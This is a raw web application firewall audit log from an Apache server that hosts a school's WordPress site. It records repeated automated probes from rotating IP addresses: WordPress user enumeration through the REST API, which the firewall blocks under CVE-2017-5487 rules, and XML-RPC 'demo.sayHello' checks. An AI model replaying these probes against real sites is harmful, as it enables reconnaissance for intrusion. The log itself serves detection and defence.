103.236.140.4 8181 --1dfd9d73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.82 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1dfd9d73-C-- demo.sayHello --1dfd9d73-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dfd9d73-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463832642466 5303 (- - -) Stopwatch2: 1746463832642466 5303; combined=4177, p1=510, p2=3388, p3=47, p4=89, p5=87, sr=71, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dfd9d73-Z-- --7cb3e16e-A-- [05/May/2025:23:50:35 +0700] aBjsW02V_h1VFAgsfgaDKAAAAAo 103.236.140.4 41442 103.236.140.4 8181 --7cb3e16e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7cb3e16e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cb3e16e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463835483158 2983 (- - -) Stopwatch2: 1746463835483158 2983; combined=1296, p1=436, p2=826, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cb3e16e-Z-- --63e0a26c-A-- [05/May/2025:23:50:38 +0700] aBjsXk2V_h1VFAgsfgaDLgAAAAU 103.236.140.4 41466 103.236.140.4 8181 --63e0a26c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --63e0a26c-C-- demo.sayHello --63e0a26c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --63e0a26c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463838799832 5307 (- - -) Stopwatch2: 1746463838799832 5307; combined=4225, p1=534, p2=3470, p3=32, p4=36, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63e0a26c-Z-- --e856823f-A-- [05/May/2025:23:50:41 +0700] aBjsYYZWvR7-42f6JrASIwAAAME 103.236.140.4 41498 103.236.140.4 8181 --e856823f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e856823f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e856823f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463841954755 2165 (- - -) Stopwatch2: 1746463841954755 2165; combined=1166, p1=371, p2=766, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e856823f-Z-- --a296ad31-A-- [05/May/2025:23:50:44 +0700] aBjsZPZJDMuQndL03JNkIAAAAEk 103.236.140.4 41534 103.236.140.4 8181 --a296ad31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a296ad31-C-- demo.sayHello --a296ad31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a296ad31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463844697399 5802 (- - -) Stopwatch2: 1746463844697399 5802; combined=4296, p1=514, p2=3558, p3=32, p4=36, p5=92, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a296ad31-Z-- --0f136438-A-- [05/May/2025:23:52:13 +0700] aBjsvU2V_h1VFAgsfgaDowAAABQ 103.236.140.4 42304 103.236.140.4 8181 --0f136438-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0f136438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f136438-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463933172469 2540 (- - -) Stopwatch2: 1746463933172469 2540; combined=1203, p1=400, p2=773, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f136438-Z-- --3b860367-A-- [05/May/2025:23:52:14 +0700] aBjsvk2V_h1VFAgsfgaDpgAAAAw 103.236.140.4 42314 103.236.140.4 8181 --3b860367-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b860367-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b860367-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463934308828 2531 (- - -) Stopwatch2: 1746463934308828 2531; combined=1496, p1=463, p2=996, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b860367-Z-- --f7203575-A-- [05/May/2025:23:52:16 +0700] aBjswPZJDMuQndL03JNkOgAAAFA 103.236.140.4 42338 103.236.140.4 8181 --f7203575-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f7203575-C-- demo.sayHello --f7203575-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7203575-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463936211020 5637 (- - -) Stopwatch2: 1746463936211020 5637; combined=4210, p1=540, p2=3382, p3=35, p4=35, p5=154, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7203575-Z-- --f043a32a-A-- [05/May/2025:23:52:17 +0700] aBjswU2V_h1VFAgsfgaDrgAAABA 103.236.140.4 42356 103.236.140.4 8181 --f043a32a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f043a32a-C-- demo.sayHello --f043a32a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f043a32a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463937879018 4959 (- - -) Stopwatch2: 1746463937879018 4959; combined=3993, p1=515, p2=3259, p3=29, p4=32, p5=93, sr=89, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f043a32a-Z-- --298f6a71-A-- [05/May/2025:23:52:20 +0700] aBjsxE2V_h1VFAgsfgaDtAAAAAk 103.236.140.4 42380 103.236.140.4 8181 --298f6a71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --298f6a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --298f6a71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463940449627 2480 (- - -) Stopwatch2: 1746463940449627 2480; combined=1439, p1=445, p2=960, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --298f6a71-Z-- --3a9db936-A-- [05/May/2025:23:52:23 +0700] aBjsxwRwKNFSM6B7_LamAQAAAJA 103.236.140.4 42416 103.236.140.4 8181 --3a9db936-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.82 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3a9db936-C-- demo.sayHello --3a9db936-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a9db936-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463943605482 6100 (- - -) Stopwatch2: 1746463943605482 6100; combined=4844, p1=630, p2=3966, p3=39, p4=43, p5=98, sr=118, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a9db936-Z-- --2e7daa20-A-- [05/May/2025:23:53:20 +0700] aBjtAIZWvR7-42f6JrASggAAAMo 103.236.140.4 42906 103.236.140.4 8181 --2e7daa20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e7daa20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e7daa20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464000039905 2910 (- - -) Stopwatch2: 1746464000039905 2910; combined=1511, p1=489, p2=986, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e7daa20-Z-- --c006bf25-A-- [05/May/2025:23:53:25 +0700] aBjtBYZWvR7-42f6JrASiQAAANc 103.236.140.4 42966 103.236.140.4 8181 --c006bf25-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.207 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c006bf25-C-- demo.sayHello --c006bf25-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c006bf25-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464005762059 5838 (- - -) Stopwatch2: 1746464005762059 5838; combined=4329, p1=532, p2=3560, p3=39, p4=35, p5=96, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c006bf25-Z-- --156dbe33-A-- [05/May/2025:23:54:22 +0700] aBjtPoZWvR7-42f6JrASnAAAAMo 103.236.140.4 43348 103.236.140.4 8181 --156dbe33-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --156dbe33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --156dbe33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464062285208 2794 (- - -) Stopwatch2: 1746464062285208 2794; combined=1501, p1=451, p2=1014, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --156dbe33-Z-- --3ae17f5f-A-- [05/May/2025:23:54:25 +0700] aBjtQQRwKNFSM6B7_LamRgAAAIM 103.236.140.4 43384 103.236.140.4 8181 --3ae17f5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.69 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3ae17f5f-C-- demo.sayHello --3ae17f5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae17f5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464065164709 5124 (- - -) Stopwatch2: 1746464065164709 5124; combined=4122, p1=535, p2=3365, p3=32, p4=35, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae17f5f-Z-- --d3e31765-A-- [05/May/2025:23:54:28 +0700] aBjtRPZJDMuQndL03JNkXQAAAEg 103.236.140.4 43416 103.236.140.4 8181 --d3e31765-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d3e31765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3e31765-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464068639397 3252 (- - -) Stopwatch2: 1746464068639397 3252; combined=1403, p1=483, p2=890, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3e31765-Z-- --835b117a-A-- [05/May/2025:23:54:31 +0700] aBjtR4ZWvR7-42f6JrASpQAAAMk 103.236.140.4 43436 103.236.140.4 8181 --835b117a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --835b117a-C-- demo.sayHello --835b117a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --835b117a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464071407358 5581 (- - -) Stopwatch2: 1746464071407358 5581; combined=4219, p1=530, p2=3446, p3=30, p4=34, p5=105, sr=72, sw=74, l=0, gc=0 Producer: 